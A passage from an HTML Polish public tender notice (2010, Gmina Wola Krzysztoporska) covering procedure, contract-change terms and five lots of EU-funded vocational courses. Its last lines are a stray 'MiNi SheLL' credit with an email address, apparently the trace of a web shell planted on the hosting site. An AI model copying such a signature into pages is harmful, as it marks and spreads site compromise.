<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wykonawca może zaproponować  w ramach poszczególnych części szkoleń zmiany programu.
Wprowadzenie jakichkolwiek zmian w programie po podpisaniu umowy może nastąpić wyłącznie za zgodą Zamawiającego. Wykonawca  zobowiązuje się do przedstawienia proponowanych zmian w formie pisemnej, przy czym zmiany te nie mogą prowadzić do wyższej ceny jednostkowej za szkolenie (ani do obniżenia standardu szkolenia)  niż wynika to  ze złożonej oferty. Liczba godzin szkolenia nie może ulec zmianie.
2. Zmiana harmonogramu może nastąpić tylko za zgodą Zamawiającego. 
3. Wykonawca zobowiązany jest do wykonywania szkolenia przy użyciu zasobów wskazanych w ofercie. Zmiana zasobów (pojazdy, sala wykładowa, plac manewrowy, instruktor) może nastąpić na umotywowany wniosek Wykonawcy. Zamawiający wyrazi zgodę na zmianę tylko wtedy, jeżeli wskazane  do wykonywania zamówienia zasoby będą spełniały parametry  wymagane treścią SIWZ.
4. W przypadku wprowadzenia innej stawki podatku VAT na usługi szkoleniowe do ceny szkolenia, doliczony zostanie podatek VAT w wysokości określonej w obowiązujących przepisach. W tym samym zakresie ulegnie zmianie wysokość wynagrodzenia całkowitego za wykonanie umowy.




5. Opisane w pkt. III niniejszej SIWZ Opis przedmiotu zamówienia zastrzeżenia dotyczące zmniejszenia liczby uczestników dotyczą możliwości finansowych Zamawiającego. Na dzień ogłoszenia przetargu Zamawiający dysponuje środkami finansowymi na przeszkolenie w zakresie części I - 5 osób, w zakresie części II - 5 osób, w zakresie części III - 5 osób. Jednakże ze względu na duże zainteresowanie tymi szkoleniami Zamawiający zamierza oszczędności projektowe ( m.in. poprzetargowe) przeznaczyć na przeszkolenie pozostałych wskazanych w pkt. III osób tj. dodatkowo w części  I - 3 osób, część II - 6 osób, część III - 2 osób. Przeszkolenie dodatkowych osób uzależnione jest od uzyskania odpowiednio dużych oszczędności oraz uzyskania zgody Instytucji Pośredniczącej na wprowadzone zmiany.
Niezależnie od ww. sytuacji zamawiający zastrzega sobie możliwość zmniejszenia liczby uczestników z powodu zdarzeń losowych. 
W odniesieniu kalkulacji ceny umownej,  strony ustalają, że :
a) w przypadku zmniejszenia  liczby uczestników (np. rezygnacji, wykluczenia uczestnika lub dokonania zmiany szkolenia przez Uczestnika) 	przed  datą  rozpoczęciu kursu Wykonawcy zostanie wypłacone wynagrodzenie umowne  skalkulowane według rzeczywistej liczby osób rozpoczynających szkolenie (według listy przekazanej przez Wykonawcę).
b)  w przypadku zmniejszenia  liczby uczestników (np. rezygnacji lub wykluczenia uczestnika) po dacie rozpoczęciu szkolenia:
-    za zajęcia teoretyczne zostanie wypłacone w całości wynagrodzenie określone w ofercie, 
- w przypadku zajęć praktycznych indywidualnych określonych w załącznikach do umowy  wynagrodzenie zostanie wypłacone jedynie za zrealizowaną ilość godzin szkoleniowych  po przedstawieniu szczegółowej kalkulacji kosztów przez  Wykonawcę.
c) następujące składniki wynagrodzenia za usługę szkoleniową: badania lekarskie i psychologiczne,
 - zostaną wypłacone Wykonawcy za rzeczywistą liczbę przeprowadzonych badań, wartość ta może ulec zmniejszeniu w przypadku jeżeli ich wykonanie okaże się zbędne (np. gdy uczestnik posiada aktualne badania),
d) składnik wynagrodzenia za usługę szkoleniową: zapewnienie ciepłych posiłków - zostanie wypłacona wykonawcy za rzeczywistą liczbę ciepłych posiłków zapewnionych Uczestnikom Projektu; liczba ta może być mniejsza niż wynikająca z kalkulacji określonej załączniku nr 2 do umowy np. w przypadku rezygnacji ze szkolenia Uczestnika i nie skierowania na to miejsce innej osoby, natomiast wynagrodzenia zostanie wypłacone w całości za zapewnienie posiłku na zajęciach w przypadku kiedy Uczestnik bez uprzedzenia będzie na nich nieobecny.
7. Miejsce szkolenia lub prowadzący szkolenie wykładowca może ulec zmianie z powodów losowych na wniosek Wykonawcy  po uzyskaniu zgody Zamawiającego. Zamawiający wyrazi zgodę na zmianę  jeżeli kwalifikacje osób prowadzących szkolenia  oraz standard sal wykładowych będą  nie gorsze niż wskazane w ofercie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wola-krzysztoporska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Wola Krzysztoporska
Ul. Kościuszki 5
97-371 Wola Krzysztoporska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2010 godzina 12:00, miejsce: Gmina Wola Krzysztoporska
Ul. Kościuszki 5
97-371 Wola Krzysztoporska
pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenia realizowane są w ramach projektu Mój nowy zawód współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego  w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013: Priorytet VIII. Regionalne kadry gospodarki. Działanie 8.1. Rozwój pracowników i przedsiębiorstw  w regionie. Poddziałanie 8.1.2 Wsparcie procesów adaptacyjnych i modernizacyjnych w regionie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I. Przeprowadzenie szkolenia : Bukieciarstwo i florystyka..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający wymaga przeprowadzenia szkolenia wg. następującego programu:

Lp.	Nazwa przedmiotu	Liczba godzin 
1.	Botanika - wprowadzenie do bukieciarstwa
- gatunki roślin, szkodniki,nawożenie i przedłużanie żywotności
- technika suszenia roślin i ich przechowywanie;
- dobór gatunków roślin i przygotowanie do suszenia.
	4
2.	Dekoracje pogrzebowe 
- dobór materiałów do dekoracji pogrzebowych;
- wieniec obręczowy - technika wykonania;
- wieniec poduszkowy - technika wykonania;
- wiązanki pogrzebowe - rodzaje i technika wykonania.
	30
3.	Wyroby ślubne i komunijne
- rodzaje wiązanek ślubnych i zasady układania roślin;
- materiał roślinny i materiały pomocnicze do wiązanek ślubnych;
- wiązanka spływająca;
- wiązanki fantazyjne;
- dobór gatunków roślin do wianka;
- technika wykonywania wianka i wiązanki komunijnej.
	30
4.	Wiązanki i dekoracje okolicznościowe 
- zasady doboru kwiatów do kompozycji;
- technika układania kwiatów w ręku;
- technika układania kwiatów w naczyniach;
- stroiki na Boże Narodzenie i Wielkanoc.
	30
5	Stylizacja wnętrz materiałem roślinnym np. kościołów,sal weselnych itp.
-dekoracje	26
	RAZEM	120

Wykonawca w ramach usługi zobowiązany jest  również do zapewnienia uczestnikom szkolenia  ciepłych posiłków na wszystkich zajęciach grupowych oraz wykonania pozostałych obowiązków Wykonawcy opisanych we wzorze umowy stanowiącym załącznik   nr 8 do SIWZ
     
Zamawiający wymaga  przeprowadzenia szkolenia w Piotrkowie Trybunalskim lub Woli Krzysztoporskiej.

Liczba osób objęta  szkoleniem - 8,  z zastrzeżeniem, że   Zamawiający ma uprawnienie do rezygnacji z przeszkolenia 3 osób.

Uczestnikowi, który ukończy kurs z wynikiem pozytywnym wydane będzie przez Wykonawcę   zaświadczenie na podstawie §6 Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez osoby  dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych  w formach pozaszkolnych (Dz.U. 06.Nr 31.poz 216 ze zmianami).

Kod CPV: 80500000-9 Usługi szkoleniowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II. Przeprowadzenie szkolenia : Księgowość od podstaw..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający wymaga przeprowadzenia szkolenia wg. następującego programu:
1.	pełna księgowość i rachunkowość, sporządzanie sprawozdań finansowych i bilansu  - 30 godzin,
2.	zastosowanie komputerowych programów  w księgowości - 40 godzin,
3.	podatki - rozliczenia z urzędem skarbowym - 10 godzin,
4.	płace, program płatnik, rozliczenia z zus-em  - 25 godzin,
5.	książka przychodów i rozchodów - 15 godzin
Razem 	120 godzin

Wykonawca w ramach usługi zobowiązany jest  również do zapewnienia uczestnikom szkolenia  ciepłych posiłków na wszystkich zajęciach grupowych oraz wykonania pozostałych obowiązków Wykonawcy opisanych we wzorze umowy stanowiącym załącznik   nr 8 do SIWZ

Zamawiający wymaga  przeprowadzenia szkolenia w Piotrkowie Trybunalskim lub Woli Krzysztoporskiej.
Liczba osób objęta  szkoleniem - 11,  z zastrzeżeniem, że   Zamawiający ma uprawnienie do rezygnacji z przeszkolenia 6 osób.
Uczestnikowi, który ukończy kurs z wynikiem pozytywnym wydane będzie przez Wykonawcę   zaświadczenie na podstawie §6 Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez osoby  dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych  w formach pozaszkolnych (Dz.U. 06.Nr 31.poz 216 ze zmianami).

Kod CPV: 80500000-9 Usługi szkoleniowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III. Przeprowadzenie szkolenia: Kurs kosmetyczny z elementami wizażu i stylizacja paznokci..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III. Przeprowadzenie szkolenia: Kurs kosmetyczny z elementami wizażu i stylizacja paznokci.

Zamawiający wymaga przeprowadzenia szkolenia wg. następującego programu:
   1.Moduł kosmetyczny z elementami wizażu obejmuje 100 godzin dydaktycznych. 
   W programie m.in.: 
	analiza kolorystyczna - typy urody, dobór kolorów do typu urodu
	korekta twarzy - techniczne możliwości poprawienia niedoskonałości urody za pomocą makijażu
	makijaż i stylizacja 
	pielęgnacja twarzy - zabiegi pielęgnacyjne skóry twarzy, wykonanie henny,
	pielęgnacja kończyn górnych 
	pielęgnacja kończyn dolnych 
	masaż kosmetyczny 
2. Moduł stylizacji paznokci obejmuje 40 godzin dydaktycznych
W programie m.in.: 
	choroby i budowa paznokci - podstawowe wiadomości
	manicure i pedicure - abc zadbanych paznokci                                  
	masaż dłoni i stóp 
	przedłużanie paznokci metodą akrylową czyli sztuka modelowania 
	przedłużanie paznokci metodą żelową czyli utwardzanie 
	elementy zdobnictwa 
	
Wykonawca w ramach usługi zobowiązany jest  również do zapewnienia uczestnikom szkolenia  ciepłych posiłków na wszystkich zajęciach grupowych oraz wykonania pozostałych obowiązków Wykonawcy opisanych we wzorze umowy stanowiącym załącznik   nr 8 do SIWZ

Zamawiający wymaga  przeprowadzenia szkolenia w Piotrkowie Trybunalskim lub Woli Krzysztoporskiej.

Liczba osób objęta  szkoleniem - 7,  z zastrzeżeniem, że   Zamawiający ma uprawnienie do rezygnacji z przeszkolenia 3 osób.
Uczestnikowi, który ukończy kurs z wynikiem pozytywnym wydane będzie przez Wykonawcę   zaświadczenie na podstawie §6 Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez osoby  dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych  w formach pozaszkolnych (Dz.U. 06.Nr 31.poz 216 ze zmianami).

Kod CPV: 80500000-9 Usługi szkoleniowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV. Przeprowadzenie szkolenia: Podstawy gospodarki magazynowej z obsługą wózków jezdniowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający wymaga przeprowadzenia szkolenia wg. następującego programu:
1. Kierowca wózków jezdniowych z napędem silnikowym z uprawnieniami do obsługi - wymiany butli gazowej w wózkach wyposażonych w instalację do zasilania gazem
67 godz.., w tym:
- 47 godz. zajęć teoretycznych
- 20 godz. zajęć praktycznych, w tym 5 godz. w zakresie obsługi wymiany butli gazowej
Szkolenie ma na celu przygotowanie do obsługiwania wózków jezdniowych w transporcie wewnątrzzakładowym. Tematyka zajęć:
-  typy stosowanych wózków jezdniowych,
-  budowa wózka,
- czynności operatora przy obsłudze wózków przed rozpoczęciem pracy, w czasie pracy,                                          po zakończeniu pracy,
- ładunkoznawstwo,
- wiadomości z zakresu bhp,
- wiadomości o dozorze technicznym,
- przygotowanie do wykonania czynności związanych z wymianą butli, pokaz, próbne wykonanie wymiany butli przez kierowcę, samodzielna wymiana butli.
Egzamin kwalifikacyjny przed Komisją Urzędu Dozoru Technicznego.
2. PODSTAWY KSIEGOWOŚCI MAGAZYNOWEJ
80 godz.- 100% zajęcia praktyczne na komputerze
	Magazyn,
	Płatności,
	Faktura,
	Raporty
4. PRAWO SPOŻYWCZE (Dobra Praktyka Produkcyjna - GMP, Dobra Praktyka Higieniczna - GHP i zasady HACCP)
10 godz. = 5 godz.  wykładów + 5 godz. ćwiczeń
u osób podejmujących pracę w miejscach gdzie występuje kontakt z artykułami spożywczymi.
Tematyka zajęć:
	geneza i rozwój systemów jakości,
	zarządzanie bezpieczeństwem żywności,
	kontrola wewnętrzna - wymagania,
	zasada GMP, dokumentacja i zapisy,
4. OBSŁUGA KAS FISKALNYCH I WAG ELEKTONICZNYCH
10 godz. - 100% szkolenia praktyczne
Każdy uczestnik ma zapewnione samodzielne stanowisko do ćwiczeń
Tematyka zajęć:
	wyjaśnienie podstawowych pojęć związanych z kasami fiskalnymi, obowiązki prawne 
w zakresie instalowania kas fiskalnych,
	rodzaje kas fiskalnych i informacje o budowie, włączanie, wymiana rolek papieru, taśmy barwiącej, korekta i sygnalizacja błędów, unieważnieniem, wpłata i wypłata pieniędzy, sporządzanie raportów dobowych i okresowych,
	funkcje kas fiskalnych, wykonywanie raportów,
	raporty sprzedaży zerowej, sprzedaży dziennej i dekadowej, programowanie kas,
	konserwacja, naprawa, awarie, zasada postępowania w przypadkach nagłych awarii,
	obowiązki ciążące na użytkowniku kasy 
	urządzenia wagowe,
	funkcje wag elektronicznych.
	zasada GHP, dokumentacja i zapisy.
Wykonawca w ramach usługi zobowiązany jest  również do zapewnienia uczestnikom szkolenia  ciepłych posiłków na wszystkich zajęciach oraz wykonania pozostałych obowiązków Wykonawcy opisanych we wzorze umowy stanowiącym załącznik   nr 8 do SIWZ
     
Zamawiający wymaga  przeprowadzenia szkolenia w Piotrkowie Trybunalskim lub Woli Krzysztoporskiej.

Liczba osób objęta  szkoleniem - 2,  

Uczestnikowi, który ukończy kurs z wynikiem pozytywnym wydane będzie przez Wykonawcę   zaświadczenie na podstawie §6 Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez osoby  dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych  w formach pozaszkolnych (Dz.U. 06.Nr 31.poz 216 ze zmianami).

Kod CPV: 80500000-9 Usługi szkoleniowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V. Profesjonalna obsługa sekretariatu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający wymaga przeprowadzenia szkolenia wg. następującego programu:
1.	podstawy obsługi komputera - 30 godzin,
2.	podstawowe zagadnienia dotyczące organizacji i funkcjonowania firmy - 10 godzin 
3.	organizacja i technika biurowa - 15 godzin zajęć, 
4.	podstawy rachunkowości - 15 godzin zajęć,
5.	stosowanie w pracy biurowej nowoczesnych urządzeń technicznych i elektronicznych - 20  godzin zajęć,
6.	technika pracy własnej, obieg i przechowywanie dokumentacji - 15 godzin zajęć,
7.	elementy wizażu - 15 godzin zajęć.
Razem 	120 godzin

Wykonawca w ramach usługi zobowiązany jest  również do zapewnienia uczestnikom szkolenia  ciepłych posiłków na wszystkich zajęciach grupowych oraz wykonania pozostałych obowiązków Wykonawcy opisanych we wzorze umowy stanowiącym załącznik   nr 8 do SIWZ.
 
  Zamawiający wymaga  przeprowadzenia szkolenia w Piotrkowie Trybunalskim lub Woli Krzysztoporskiej.

Liczba osób objęta  szkoleniem - 4.

Uczestnikowi, który ukończy kurs z wynikiem pozytywnym wydane będzie przez Wykonawcę   zaświadczenie na podstawie §6 Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez osoby  dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych  w formach pozaszkolnych (Dz.U. 06.Nr 31.poz 216 ze zmianami).

Kod CPV: 80500000-9 Usługi szkoleniowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com